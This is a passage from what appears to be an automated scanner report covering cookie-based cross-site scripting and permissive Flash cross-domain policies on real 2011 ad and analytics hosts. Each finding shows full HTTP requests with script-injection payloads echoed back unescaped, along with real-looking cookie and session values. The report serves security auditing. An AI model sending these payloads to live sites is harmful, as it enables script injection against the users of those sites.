P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...

2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f9d07<script>alert(1)</script>23cddd478e was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1f9d07<script>alert(1)</script>23cddd478e; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25877

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1f9d07<script>alert(1)</script>23cddd478e', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...

2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /scripts/wsb.php

Issue detail

The value of the webStat_108645 cookie is copied into the HTML document as plain text between tags. The payload de83d<script>alert(1)</script>25380d542c7 was submitted in the webStat_108645 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /scripts/wsb.php?WSc=yes&WSpn=&WSref=&pg=28925&ac=108645&w=1920&h=1200&c=16&js=1.6&WSvp=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&tz=300&ls=&cam=undefined&evt=undefined HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webStat_108645=da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7; webStat_108645_mv=da8aee5f04e7ebdfbf66e7f2c334e7d5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:55 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.10
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645_last=6c0c2cc469f86170c8aa98036158dc8b; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_lastvisit=12+May+2011+06%3A33%3A55; expires=Sun, 09-May-21 13:33:55 GMT; path=/; domain=.nextstat.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1718
Connection: close
Content-Type: image/png

...[SNIP]...
</b> Invalid SQL:
       insert into 108645visitor set
visitorID        = 'da8aee5f04e7ebdfbf66e7f2c334e7d5de83d<script>alert(1)</script>25380d542c7',
entryTimestamp    = '20110512063355',
exitTimestamp    = '20110512063355',
masterVisitorID = 'da8aee5f04e7ebdfbf66e7f2c334e7d5',
browserID
...[SNIP]...

2.153. http://seg.sharethis.com/getSegment.php [__stid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload d8e89<script>alert(1)</script>2569e9647a5 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&jsref=&rnd=1305206987383 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 13:31:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==d8e89<script>alert(1)</script>2569e9647a5
userid:
</div>
...[SNIP]...

2.154. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2036f"><script>alert(1)</script>d28f2b3e28b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb92036f"><script>alert(1)</script>d28f2b3e28b&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.155. http://tag.admeld.com/ad/iframe/489/businesstech/300x250/businesstech_btf [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/businesstech/300x250/businesstech_btf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d56ba"><script>alert(1)</script>6c1cec4228b was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/businesstech/300x250/businesstech_btf?t=1305206897249&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1890
Content-Type: text/html
Date: Thu, 12 May 2011 13:28:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9d56ba"><script>alert(1)</script>6c1cec4228b&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

2.156. http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm [jsc cookie]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://urbanlegends.about.com
Path:   /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm

Issue detail

The value of the jsc cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31165(a)e43f635586d was submitted in the jsc cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /b/2011/05/10/poll-superstitious-about-friday-the-13th.htm HTTP/1.1
Host: urbanlegends.about.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=1331165(a)e43f635586d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache
Vary: *
PRAGMA: no-cache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:25 GMT
Content-Type: text/html
Content-Length: 27132

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta name="docset" content="6"><meta http-equiv="Set-Cookie" content="Mint=B5CDWP23
...[SNIP]...
='0'
zOr='B5CDWP2320kA0Y2d';zTbO=zRQO=1;zp0=zp1=zp2=zp3=zfs=0;zDc=1;
zSm=zSu=zhc=zpb=zgs=zdn='';zFS='B5C10B50110B00101';zFD='B5C1B5310B50220B00202'
zDO=zis=1;zpid=zi=zRf=ztp=zpo=0;zdx=20;zfx=100;zJs=1331165(a)e43f635586d;
zi=1;zz=';336280=2-1-1299;72890=2-1-1299;336155=2-1-12-1;93048=2-1-12-1;30050=2-1-12-1';zx='3-1-1399';zde=15;zdp=1440;zds=1440;zfp=0;zfs=66;zfd=100;zdd=20;zaX=new Array(11, new Array(100,504,8198,1,'
...[SNIP]...

3. Flash cross-domain policy
There are 38 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://a.tribalfusion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.2. http://ad-emea.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.3. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.4. http://ajax.googleapis.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Thu, 12 May 2011 20:54:55 GMT
Date: Wed, 11 May 2011 20:54:55 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 59612

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

3.5. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 13:28:15 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

3.6. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.7. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.8. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.9. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 13:28:00 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.10. http://cdn.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 11611
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Thu, 12 May 2011 15:17:05 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

3.11. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
